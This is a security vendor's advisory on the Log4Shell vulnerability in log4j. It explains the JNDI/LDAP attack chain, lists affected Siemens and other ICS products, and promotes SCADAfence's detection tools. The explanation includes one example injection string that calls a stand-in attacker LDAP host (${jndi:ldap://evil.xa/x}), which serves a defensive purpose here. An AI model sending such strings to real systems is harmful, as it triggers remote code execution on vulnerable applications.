Skip to content

A SCADAfence Update Regarding The Log4Shell Vulnerability

December 10, 2021, will always be remembered by the security community as the day when a highly critical zero‑day vulnerability was found in the very popular logging library for Java applications, log4j and identified as CVE-2021-44228. Not long after identified the name “Log4Shell” was coined for the exploit and every organization, no matter their size, including every security vendor, quickly rushed to mitigate the zero-day vulnerability within their applications. This patching marathon is still a work in process as we speak.  

Log4Shell is a critical vulnerability that requires urgent action. We can’t stress enough how important this Log4Shell vulnerability is. It’s a critical security vulnerability with a CVSS score of 10 that allows attackers to execute code remotely in any vulnerable environment. 

If you have not mitigated the Log4Shell vulnerability, we strongly recommend upgrading to the latest v2 version of Log4j which includes the recent vulnerability fix. You can find the mitigation process in Apache’s official Migration from Log4j v1 document. If you are unable to upgrade to the latest version, our research team recommends disabling JMSAppender or blocking any user input from reaching its configuration.

How the Log4Shell Vulnerability Works

The Log4Shell vulnerability targets the parts of Log4j that parse and log user-controlled data. Log4Shell allows attackers to exploit and compromise vulnerable applications. The vulnerability takes advantage of Log4j’s ability to use JNDI, the Java Naming and Directory Interface. By using JNDI lookups, an attacker can force the vulnerable application to connect to an attacker-controlled LDAP (Lightweight Directory Access Protocol) server and issue a malicious payload. Here is a visual diagram of the attack chain from the Swiss Government Computer Emergency Response Team.


To exploit a vulnerable target, attackers must trick the application code into writing a log entry that includes a string such as ${jndi:ldap://evil.xa/x}. Many applications logging is essential and a lot of different information is logged about every incoming request. While the vulnerability is affecting many attack vectors, until mitigation steps and the patch is complete no application or attack vector is safe from Log4Shell.

ICS/OT industry Response to Log4Shell

When the exploitation was first reported the ICS/OT industry didn’t think they were affected but now the ICS manufacturers are rushing to respond to Log4Shell.

Siemens confirmed that 17 of its products were affected by CVE-2021-44228 and that they have started to release patches and provide mitigation advice. Products confirmed to be affected include E-Car OC, EnergyIP, Geolus, Industrial Edge Management, Logo! Soft Comfort, Mendix, MindSphere, Operation Scheduler, Siguard DSA, Simatic WinCC, SiPass, Siveillance, Solid Edge, and Spectrum Power.

Additionally, Schneider Electric also released an advisory, but they announced they are still understanding which of their products are affected. Inductive Automation, which provides SCADA software and industrial automation solutions, announced that it conducted a full audit and determined that its products are not impacted.

While OT/ICS vendors are responding to Log4Shell and publishing advisories, this is not enough to ensure that OT environments and devices are secure against the Log4Shell vulnerability. Now that OT networks are becoming increasingly connected, the attack surface is widening, and increased risk is likely. But unlike in IT, OT environments have much more at stake. To ensure this vulnerability won’t cause more harm than needed, organizations should look into network segmentation in their OT environments. This will decrease the chance that their OT devices and networks will be exploited via the Log4Shell vulnerability. 

Too often, OT devices are outdated and don’t offer the latest version or upgrade which allows attackers to easily exploit an OT environment. In the case that OT vendors provide the latest patch or upgrade, organizations need to upgrade their OT technology. However, sometimes  OT teams won’t update their technology with the secure version due to their approach of “don’t fix what’s not broken”. This outdated and passive approach can result in the organization’s OT infrastructure becoming an easy target for attackers.  

SCADAfence’s OT Security is Here to Help

First of all, at SCADAfence we are here to assure you that all our products, The SCADAfence Platform for OT Security, the Governance Platform, and the Multi-Site Platform are updated and secure from the Log4Shell vulnerability. We remediated the Log4Shell vulnerability in our deployed application services’ code. Customers do not need to take action for any of our hosted web solutions.

Log4J (6)

The SCADAfence Platform Detects & Alerts if an OT Asset is Vulnerable to the Log4Shell Vulnerability

On top of ensuring that our products are secure, SCADAfence’s researchers analyzed the vulnerability and now the SCADAfence Platform detects and alerts if an OT asset is vulnerable with the Log4Shell zero-day vulnerability. SCADAfence customers can leverage our OT security threat intelligence service to ensure they can patch and mitigate this exploit in any of their OT devices.

On top of offering OT security threat intelligence, SCADAfence enables organizations to increase their visibility into their entire network as it’s difficult to protect what you can not see. Additional recommended practices are to adopt security network monitoring solutions that provide network segmentation and micro-segmentation as this will help organizations prevent similar exploitations moving forward. 

Still Patch, Patch, Patch 

Patching is still your best bet to combat this vulnerability. If patching isn’t possible, implementing mitigation techniques is the next best path to minimize the attack surface. SCADAfence’s research team is monitoring the evolution of this vulnerability and will provide additional information and support as needed. 

If your organization is looking into securing its industrial networks, the OT & IoT cyber security experts at SCADAfence are seasoned veterans in this space and can show you how it’s done. 

To learn more about SCADAfence’s array of OT & IoT security products, and to see short product demos, click here:


About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About SCADAfence
SCADAfence helps companies with large-scale operational technology (OT) networks embrace the benefits of industrial IoT by reducing cyber risks and mitigating operational threats. Our non-intrusive platform provides full coverage of large-scale networks, offering best-in-class detection accuracy, asset discovery and user experience. The platform seamlessly integrates OT security within existing security operations, bridging the IT/OT convergence gap. SCADAfence secures OT networks in manufacturing, building management and critical infrastructure industries. We deliver security and visibility for some of world’s most complex OT networks, including Europe’s largest manufacturing facility. With SCADAfence, companies can operate securely, reliably and efficiently as they go through the digital transformation journey.